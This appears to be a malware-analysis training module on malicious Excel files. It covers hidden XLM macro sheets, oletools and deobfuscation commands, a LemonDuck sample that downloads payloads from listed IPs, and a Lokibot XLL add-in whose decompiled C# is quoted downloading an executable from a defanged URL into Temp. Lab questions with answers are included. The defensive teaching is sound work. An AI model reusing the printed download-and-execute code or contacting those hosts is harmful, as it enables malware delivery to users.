Excel Macro Analysis

Adversaries often exploit Excel 4.0 macros to execute malicious actions upon opening a document. This section analyzes a malicious Office file, detailing attacker techniques and defense strategies. Excel's macro capabilities, including VBA and API calls, are commonly abused to obfuscate code, download payloads, and execute system commands.

VBA vs XLM Macros

In the previous sections, we have already seen the abuse of macros to gain code execution on the target system. Interestingly, those macros are VBA-based. Hence, when we extract the contents of, say, a Word file, we will see a dedicated directory for the VBA macro project used inside the document. Excel is an exception when it comes to macros.

Excel has two main types of macros:

  • Excel 5.0 Macros

  • Excel 4.0 Macros

Excel supports two macro standards: the modern VBA-based macros introduced with Excel 5.0 and the legacy Excel 4.0 XLM macros. XLM macros are written as formulas in the cells of a macro sheet rather than in a VBA project, so attackers often favor them to bypass security measures that focus on VBA. Both kinds can be abused to obfuscate code, invoke Windows APIs, download malicious payloads, and execute system programs.

Excel 5.0 Macros (VBA)

Excel VBA macros, like those in Word, are written in Visual Basic for Applications. Pressing Alt+F11 opens the VBA editor, and View > Macros > View Macros lists the available macros; either route leads to the macro code, as shown in the screenshot.

To get the details of the VBA macro code, we can use olevba.py.

python c:\tools\maldoc\office\tools\oletools\olevba.py c:\Tools\Maldoc\Office\Demo\Samples\Excel\Demo\VBA\update-kb.xlsm

Excel 4.0 Macros (XLM)

Some malicious Excel files show no macros when we press Alt+F11, the shortcut for opening the VBA editor in Excel.

So the question is: how is the malicious code inserted into these files?

The answer is Excel 4.0 macros.

When attackers create such an Excel file, they insert an MS Excel 4.0 macro sheet into the workbook.

These sheets are often hidden.

The formulas are often written in white text on a white background, which hides them from the end user or analyst. However, they remain visible programmatically, for example to tools such as olevba.

Internal Structure of Excel Files

Excel files, particularly those saved in the .xls or .xlsx format, are complex structures composed of various components:

  • Worksheets: Main data containers arranged in a grid of cells holding text, numbers, or formulas.

  • Workbook: The overarching file structure containing one or more worksheets and other components.

  • Macros: Embedded VBA or Excel 4.0 scripts used for automation; can pose security risks.

  • Cells: Basic data units within worksheets, capable of storing text, numbers, or formulas.

  • OLE Objects: Embedded content like images or documents using Object Linking and Embedding (OLE).

Modern Excel files (.xlsx and the macro-enabled .xlsm) use an XML-based structure packaged as a ZIP archive. Key data is stored in xl/workbook.xml, which defines the workbook layout and includes <sheet> tags listing all sheets. Checking the state attribute of these tags (for example, state="hidden") helps identify hidden sheets, which attackers often use to conceal malicious Excel 4.0 macros.
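The hidden-sheet check described above can be sketched in Python using only the standard library. This is a minimal sketch, assuming the transitional Open XML namespace and the usual xl/workbook.xml part name; the function names are illustrative and do not belong to any tool used in this section.

```python
import zipfile
import xml.etree.ElementTree as ET

# Assumption: transitional SpreadsheetML namespace (strict-mode files use a different URI).
MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
SHEET_TAG = f"{{{MAIN_NS}}}sheet"


def hidden_sheets_from_xml(workbook_xml: bytes) -> list[tuple[str, str]]:
    """Return (sheet name, state) for every sheet that is not visible."""
    root = ET.fromstring(workbook_xml)
    results = []
    for sheet in root.iter(SHEET_TAG):
        # A missing state attribute means the sheet is visible.
        state = sheet.get("state", "visible")
        if state != "visible":
            results.append((sheet.get("name", ""), state))
    return results


def hidden_sheets(path_or_file) -> list[tuple[str, str]]:
    """Open an OOXML workbook (path or file object) and inspect xl/workbook.xml."""
    with zipfile.ZipFile(path_or_file) as archive:
        return hidden_sheets_from_xml(archive.read("xl/workbook.xml"))
```

Calling hidden_sheets() with the path of an .xlsm sample would return pairs of sheet name and state, where the state is either hidden or veryHidden.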

Let's start with getting some basic information about the file type we are dealing with using trid:

trid C:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\Urgent-patch-ALL.xls
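trid identifies files by matching signatures. As a rough illustration of the idea (not of trid's actual definitions), the sketch below checks only the two container signatures relevant to Excel workbooks. The function names are hypothetical.

```python
# Leading bytes of the two containers Excel workbooks normally use.
OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # legacy .xls (OLE2 compound file)
ZIP_MAGIC = b"PK\x03\x04"                        # OOXML packages such as .xlsx / .xlsm


def sniff_container(header: bytes) -> str:
    """Classify a file by its first bytes: 'ole2', 'zip', or 'unknown'."""
    if header.startswith(OLE2_MAGIC):
        return "ole2"
    if header.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"


def sniff_file(path: str) -> str:
    """Read just enough of the file to compare against both signatures."""
    with open(path, "rb") as handle:
        return sniff_container(handle.read(8))
```

An "ole2" result points toward the BIFF-oriented tooling used for .xls files, while "zip" points toward extracting the archive and reading its XML parts.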

Next, we can run strings on the file:

strings C:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\Urgent-patch-ALL.xls | findstr /I "http url exe dll"

A simple strings search can sometimes reveal useful information. For example, the output above reveals a PowerShell-related command.
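When the strings utility is not available, the same triage step can be approximated in Python. This is a minimal sketch, assuming that printable ASCII and UTF-16LE runs are enough for a first pass; the helper names and the default minimum length are illustrative choices, and the keyword list mirrors the findstr filter used above.

```python
import re

KEYWORDS = ("http", "url", "exe", "dll")


def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Return printable ASCII runs followed by UTF-16LE runs of at least min_len characters."""
    ascii_pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_pattern.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in wide_pattern.finditer(data)]
    return found


def filter_strings(strings: list[str], keywords=KEYWORDS) -> list[str]:
    """Keep strings containing any keyword, case-insensitively (like findstr /I)."""
    return [s for s in strings if any(k in s.lower() for k in keywords)]
```

Reading the sample with open(path, "rb").read() and passing the bytes through both functions gives a filtered list comparable to the command above. Including UTF-16LE runs matters because Office files often store text as wide characters.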

Let's check some basic information using oleid.

python C:\Tools\MalDoc\Office\Tools\oletools\oleid.py c:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\urgent-patch-all.xls

As shown in the output from OLEID, the file contains XLM macros and suggests using olevba to analyse them.

python C:\Tools\MalDoc\Office\Tools\oletools\olevba.py c:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\urgent-patch-all.xls

OLEDUMP includes several plugins, notably plugin_biff, which is used to analyze the older Excel 97–2003 BIFF format and detect potential Excel 4.0 macro usage.

python C:\Tools\MalDoc\Office\Tools\oletools\oledump\oledump.py c:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\urgent-patch-all.xls -p plugin_biff 

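This plugin parses the BIFF format used in .xls files (which is where Excel 4 macros are stored) and provides a lot of information. We need to filter it down to the records related to Excel 4 macros. The -x option, passed to the plugin through --pluginoptions, selects all records relevant to Excel 4 macros:

python C:\Tools\MalDoc\Office\Tools\oletools\oledump\oledump.py c:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\urgent-patch-all.xls -p plugin_biff --pluginoptions "-x"

This shows us all records relevant to Excel 4.0 macros, including the records that contain suspicious commands.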

Hidden sheets

Workbook sheets may be hidden or "very hidden," but can be detected using plugin_biff, YARA signatures, or revealed directly in Microsoft Office.
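To show what such a detection looks at, here is a minimal sketch that reads the BOUNDSHEET records of a BIFF8 Workbook stream, where each sheet's visibility and type are recorded. It assumes an unencrypted BIFF8 stream whose bytes have already been extracted (for example with the third-party olefile package, which is an assumption and not used here). The function names are hypothetical, and this is not how plugin_biff itself is implemented.

```python
import struct

BOUNDSHEET = 0x0085
EOF = 0x000A
VISIBILITY = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPE = {0: "worksheet", 1: "macro sheet", 2: "chart", 6: "VBA module"}


def iter_biff_records(stream: bytes):
    """Yield (record type, payload) pairs; each record has a 4-byte header."""
    offset = 0
    while offset + 4 <= len(stream):
        rec_type, rec_len = struct.unpack_from("<HH", stream, offset)
        yield rec_type, stream[offset + 4 : offset + 4 + rec_len]
        offset += 4 + rec_len


def list_sheets(stream: bytes) -> list[tuple[str, str, str]]:
    """Return (name, sheet type, visibility) for each BOUNDSHEET record."""
    sheets = []
    for rec_type, data in iter_biff_records(stream):
        if rec_type == EOF:
            break  # BOUNDSHEET records sit in the first (globals) substream
        if rec_type != BOUNDSHEET or len(data) < 8:
            continue
        state = data[4] & 0x03      # low two bits: 0 visible, 1 hidden, 2 very hidden
        kind = data[5]              # 1 marks an Excel 4.0 macro sheet
        char_count = data[6]
        is_utf16 = data[7] & 0x01   # flag bit: name stored as UTF-16LE
        raw = data[8 : 8 + char_count * (2 if is_utf16 else 1)]
        name = raw.decode("utf-16-le" if is_utf16 else "latin-1")
        sheets.append((name, SHEET_TYPE.get(kind, hex(kind)), VISIBILITY.get(state, str(state))))
    return sheets
```

A sheet reported as a hidden or very hidden macro sheet is a strong reason to continue with the Excel 4.0 macro analysis.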

In the Excel UI, we can reveal a hidden sheet by right-clicking any sheet tab and selecting "Unhide". Sheets marked "very hidden" are not listed in this dialog.

Select the hidden sheet and click OK to unhide it.

This is what the hidden sheet looks like: completely blank.

Select all cells and change the font color to something dark to reveal the formulas.

This technique is often used by adversaries to hide formulas from the analyst's eyes. We will now use XLMMacroDeobfuscator to extract the XLM or Excel 4.0 macros.

xlmdeobfuscator --file c:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\urgent-patch-all.xls

AMSI Monitoring

AMSI can help analyze malware behavior without manual deobfuscation, though it requires execution. The AMSIScriptContentRetrieval PowerShell script leverages the AMSI ETW provider to extract script content, which we will demonstrate.

First, we need to start an ETW trace for the provider Microsoft-Antimalware-Scan-Interface:

logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets

After starting the trace, execute the malicious macro or script so that AMSI logs its content. Then stop the trace with the following command:

logman stop AMSITrace -ets

Then, we'll run the script to extract the deobfuscated content from AMSI:

C:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\AMSIScriptContentRetrieval.ps1

Questions

Q1) Perform analysis of Excel VBA macro file "update-kb.xlsm" located at "C:\Tools\Maldoc\Office\Demo\Samples\Excel\Demo\VBA". The macro code runs the downloaded executable using a PowerShell cmdlet. Type the name of the PowerShell cmdlet as your answer. Answer format is *****-******s

python c:\tools\maldoc\office\tools\oletools\olevba.py C:\Tools\Maldoc\Office\Demo\Samples\Excel\Demo\VBA\update-kb.xlsm

Answer: Start-Process

Obfuscated Excel 4.0 Macro (XLM)

We'll start with getting some basic information about the file we are dealing with using trid:

trid C:\Tools\MalDoc\Office\Demo\Samples\Excel\LemonDuck\Document_1997713103_03232021_Copy.xlsm

Next, we'll gather more information about this file using oleid.

python C:\Tools\MalDoc\Office\Tools\oletools\oleid.py C:\Tools\MalDoc\Office\Demo\Samples\Excel\LemonDuck\Document_1997713103_03232021_Copy.xlsm

The oleid output indicates that this file contains XLM macros. We'll use olevba to analyze them.

python C:\Tools\MalDoc\Office\Tools\oletools\olevba.py C:\Tools\MalDoc\Office\Demo\Samples\Excel\LemonDuck\Document_1997713103_03232021_Copy.xlsm

Olevba shows the details of the raw EXCEL4/XLM macro formulas. It also shows the deobfuscated EXCEL4/XLM macro formulas at the bottom.

We can see the suspicious URLs that host the malicious files.

Zipdump gives us a glimpse of what's inside the Excel file.

python C:\Tools\MalDoc\Office\Tools\DidierStevensSuite\zipdump.py C:\Tools\MalDoc\Office\Demo\Samples\Excel\LemonDuck\Document_1997713103_03232021_Copy.xlsm

We start our manual analysis by extracting the Excel file with the 7zip utility. The output below shows the contents of the sample Excel file.

There is one directory named "xl". The image below shows the contents in the "xl" directory.

The workbook.xml file contains essential details about the Excel project, useful for identifying hidden, potentially malicious sheets and macros during analysis.

sharedStrings.xml is another very important file we need to check to uncover all strings used in the project. The Excel project uses indices in this document to reference the strings.
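The index lookup can be sketched as follows: a cell with t="s" stores an index in its <v> element, and that index points into the list of <si> entries in sharedStrings.xml. This is a minimal sketch, assuming the transitional SpreadsheetML namespace; the function names are illustrative.

```python
import xml.etree.ElementTree as ET

# Assumption: transitional SpreadsheetML namespace.
MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": MAIN_NS}
TEXT_TAG = f"{{{MAIN_NS}}}t"
CELL_TAG = f"{{{MAIN_NS}}}c"


def load_shared_strings(shared_xml: bytes) -> list[str]:
    """Return the shared string table in index order."""
    root = ET.fromstring(shared_xml)
    table = []
    for item in root.findall("m:si", NS):
        # Rich text splits one string across several <t> runs; join them.
        table.append("".join(t.text or "" for t in item.iter(TEXT_TAG)))
    return table


def resolve_cells(sheet_xml: bytes, table: list[str]) -> dict[str, str]:
    """Map cell references (e.g. 'A1') to the shared string they point at."""
    root = ET.fromstring(sheet_xml)
    resolved = {}
    for cell in root.iter(CELL_TAG):
        value = cell.find("m:v", NS)
        if cell.get("t") == "s" and value is not None and value.text is not None:
            resolved[cell.get("r", "")] = table[int(value.text)]
    return resolved
```

Resolving the indices this way makes it easier to read sheet XML in which API names or URL fragments appear only as numbers.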

Finally, the directory macrosheets contains our malicious macros.
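To list the formulas stored in that directory without unpacking the archive by hand, a short standard-library script may help. This is a sketch under the assumption that macro sheet parts live under xl/macrosheets/ and keep their formulas in <f> elements of the main SpreadsheetML namespace; the function name is hypothetical.

```python
import zipfile
import xml.etree.ElementTree as ET

# Assumption: cells and formulas use the transitional SpreadsheetML namespace.
MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
CELL_TAG = f"{{{MAIN_NS}}}c"
FORMULA_TAG = f"{{{MAIN_NS}}}f"


def macrosheet_formulas(path_or_file) -> dict[str, list[tuple[str, str]]]:
    """Return {part name: [(cell reference, formula text), ...]} for each macro sheet."""
    formulas = {}
    with zipfile.ZipFile(path_or_file) as archive:
        for name in archive.namelist():
            lowered = name.lower()
            # Skip relationship parts such as _rels/sheet1.xml.rels.
            if not lowered.startswith("xl/macrosheets/") or not lowered.endswith(".xml"):
                continue
            root = ET.fromstring(archive.read(name))
            cells = []
            for cell in root.iter(CELL_TAG):
                formula = cell.find(FORMULA_TAG)
                if formula is not None and formula.text:
                    cells.append((cell.get("r", ""), formula.text))
            formulas[name] = cells
    return formulas
```

The result is the raw, still obfuscated formula text per cell, which is the starting point for the deobfuscation step.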

Automating the XLM Deobfuscation

The tool XLMMacroDeobfuscator can automate the manual process of XLM deobfuscation. This tool emulates macro code execution to produce deobfuscated macro code.

xlmdeobfuscator --file "C:\Tools\MalDoc\Office\Demo\Samples\Excel\LemonDuck\Document_1997713103_03232021_Copy.xlsm"

When the user opens the document, the macro in sheet1 is invoked. It downloads three payloads (doka, doka1, and doka2) from 188.127.227.99, 45.150.67.29, and 195.123.213.126, respectively, by calling URLDownloadToFileA from urlmon.dll.

The macro in sheet2 then runs. It simply uses the =EXEC() function to launch rundll32, which invokes the DllRegisterServer function exported by doka, doka1, and doka2.
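Once the macro is deobfuscated, the network indicators can be pulled out of the tool output for reporting. The following is a minimal sketch, assuming the deobfuscated output has been saved as text; the helper names are hypothetical, and the defanging style only approximates the notation used in this document.

```python
import re

# Each octet is limited to 0-255 so that values such as 999.1.1.1 are ignored.
OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
IPV4 = re.compile(rf"\b(?:{OCTET}\.){{3}}{OCTET}\b")


def extract_ipv4(text: str) -> list[str]:
    """Return unique IPv4 addresses in order of first appearance."""
    seen = []
    for match in IPV4.finditer(text):
        if match.group() not in seen:
            seen.append(match.group())
    return seen


def defang(indicator: str) -> str:
    """Make an indicator non-clickable before pasting it into a report."""
    return indicator.replace("http", "hxxp", 1).replace(".", "[.]")
```

Running extract_ipv4() over the saved output for this sample should surface the three download hosts named above, which can then be defanged and shared.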

Excel-DNA C# XLL Add-ins (Lokibot)

Malware groups are increasingly using malicious Excel add-in (XLL) files as an alternative to VBA for executing malicious code. An XLL is a DLL that Excel loads and that extends Excel through API calls.

Most XLL files are written in C or C++ and run natively inside Excel, but developers can also write them in C#. To do this, they use Excel-DNA, a free, open-source library for building Excel add-ins with .NET. This combines the native integration of an XLL with the convenience of C#. Such add-ins can add new functions, automate tasks, and more.

How Excel-DNA Works

Excel-DNA works by packaging .NET code behind a native XLL loader that Excel can load. The core components of an Excel-DNA add-in include:

  • ExcelDna.Integration: This is the primary library that enables integration with Excel. It provides attributes and classes for creating custom Excel functions, macros, and ribbon extensions.

  • ExcelDna.AddIn: This defines the entry point of the XLL Add-In and contains the logic for loading and managing the Add-In's functionality.

  • .dna File: This XML-based file defines the Add-In's configuration, specifying which .NET assemblies to load, any additional references, and the Add-In’s main class.

This .dna XML file is very important as it will help us identify which DLL file to analyze.
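Reading the .dna file can also be scripted. The sketch below collects the attributes of every ExternalLibrary element, whether or not the file declares an XML namespace. The function name is hypothetical, and the sketch assumes the .dna content has already been extracted from the XLL.

```python
import xml.etree.ElementTree as ET


def external_libraries(dna_xml: bytes) -> list[dict[str, str]]:
    """Return the attributes of each ExternalLibrary element in a .dna file."""
    root = ET.fromstring(dna_xml)
    libraries = []
    for element in root.iter():
        # Drop a '{namespace}' prefix, if present, before comparing the tag name.
        local_name = element.tag.rsplit("}", 1)[-1]
        if local_name == "ExternalLibrary":
            libraries.append(dict(element.attrib))
    return libraries
```

The Path attribute of each returned entry names the library that deserves a closer look in a .NET decompiler.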

After opening the sample in PE-Bear, the first thing to look for is a resource of type DNA.

We'll use an open-source project called ExcelDna-Unpack, which is a command-line utility to extract the contents of Excel-DNA add-ins.

C:\Tools\exceldna-unpack\exceldna-unpack.exe --xllFile="MV SEAMELODY.xll"

Let's open the DNA file in Notepad++ or another text editor.

The .dna file defines the configuration of the Excel-DNA add-in in XML format, including an ExternalLibrary element that embeds a library within the package under the identifier EXCEL NEW.

Next, we need to analyze the EXCEL NEW file, which is present in the unpacked directory. To verify its file type, we can use trid or another tool such as Detect It Easy.

trid "unpacked\EXCEL NEW.dll"

Since these XLL add-ins use a .NET DLL (as indicated by the .dna configuration file), dnSpy is an excellent tool for analyzing them.

Let's drag and drop the DLL file EXCEL NEW.dll (which is referenced in the .dna file) from the unpacked directory into dnSpy.

Once the DLL is loaded, dnSpy decompiles it into readable C# and displays its structure. You can explore methods and classes—especially public ones exposed via the XLL add-in—to identify suspicious behavior like external calls or file access.

The code is within the excel_new.ExcelDNANS namespace, and the primary class of interest is ExcelDNAInt, which implements the IExcelAddIn interface from ExcelDna.

Inside it, there is an Auto_Open method, which is an event handler that executes when the Excel add-in is loaded (similar to an Auto_Open macro in VBA). This method is where the malicious activity takes place.

The line below configures the .NET Framework to use TLS 1.2 for HTTPS connections. Note that the URL used by this sample is plain HTTP, so this setting does not encrypt the download shown here.

ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;

The code uses WebClient to download an executable file from a specified URL (hxxp[:]103[.]89[.]90[.]10/intelpro/goa[.]exe).

byte[] bytes = new WebClient().DownloadData("hxxp[:]103[.]89[.]90[.]10/intelpro/goa[.]exe");

The downloaded file is saved to the user's Temp directory as sse.exe.

File.WriteAllBytes(Environment.GetEnvironmentVariable("Temp") + "\\sse.exe", bytes);

Questions

Q1) Open the XLL sample "C:\Tools\MalDoc\Office\Demo\Samples\xll\lokibot\MV SEAMELODY.xll" in the PE-Bear. Go to the Exports tab and figure out the name of the Exported function that ends with Open. Type the function name as your answer. Answer Format is ******Open

Answer: xlAutoOpen
